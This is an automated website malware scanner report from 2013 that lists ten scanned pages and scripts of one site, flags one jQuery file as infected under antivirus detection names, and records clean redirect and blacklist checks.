Online Malware Scanner report for www.slm-syugyo.com

www.slm-syugyo.com

(cached results from Sun Jun 30 05:48:06 2013 rescan)

Malicious/Suspicious/Total urls checked: 1/0/10
1 page has malicious code. See details below
Blacklists: OK
Malicious redirects: OK
Malicious/Hidden/Total iFrames: 0/0/0
Deface / Content modification: OK

Scanned pages/files

Request / Server response / Status
http://www.slm-syugyo.com/
200 OK
Content-Length: 8956
Content-Type: text/html
clean
http://www.slm-syugyo.com/concrete/js/jquery.js?v=4befeb0e6ddfd7ebea201488fcec96cf
200 OK
Content-Length: 74274
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

Antivirus reports:

AntiVir
JS/BlacoleRef.CZ.20
CAT-QuickHeal
JS/BlacoleRef.CZB
NANO-Antivirus
Trojan.Script.Expack.brblya

http://www.slm-syugyo.com/concrete/js/ccm.base.js?v=4befeb0e6ddfd7ebea201488fcec96cf
200 OK
Content-Length: 2231
Content-Type: application/x-javascript
clean
http://www.slm-syugyo.com/themes/default/js/menu.js
200 OK
Content-Length: 329
Content-Type: application/x-javascript
clean
http://www.slm-syugyo.com/themes/default/js/jquery.lightbox-0.5.min.js
200 OK
Content-Length: 10210
Content-Type: application/x-javascript
clean
http://www.slm-syugyo.com/page01/
200 OK
Content-Length: 9809
Content-Type: text/html
clean
http://www.slm-syugyo.com/page03/
200 OK
Content-Length: 13236
Content-Type: text/html
clean
http://www.slm-syugyo.com/index.php?cID=75
200 OK
Content-Length: 8666
Content-Type: text/html
clean
http://www.slm-syugyo.com/page06/
200 OK
Content-Length: 8698
Content-Type: text/html
clean
http://www.slm-syugyo.com/index.php?cID=78
200 OK
Content-Length: 8186
Content-Type: text/html
clean

Malicious redirects

First query (normal visit):
GET / HTTP/1.1
Host: www.slm-syugyo.com

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 30 Jun 2013 02:48:07 GMT
Pragma: no-cache
Server: Apache
Vary: Host
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: CONCRETE5=ee53gs3ccm389oh6vspf54vdq5; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: www.slm-syugyo.com
Referer: http://www.google.com/search?q=www.slm-syugyo.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=www.slm-syugyo.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.ru/infected?l10n=en&url=http://www.slm-syugyo.com/

Result: www.slm-syugyo.com is not infected or malware details are not published yet.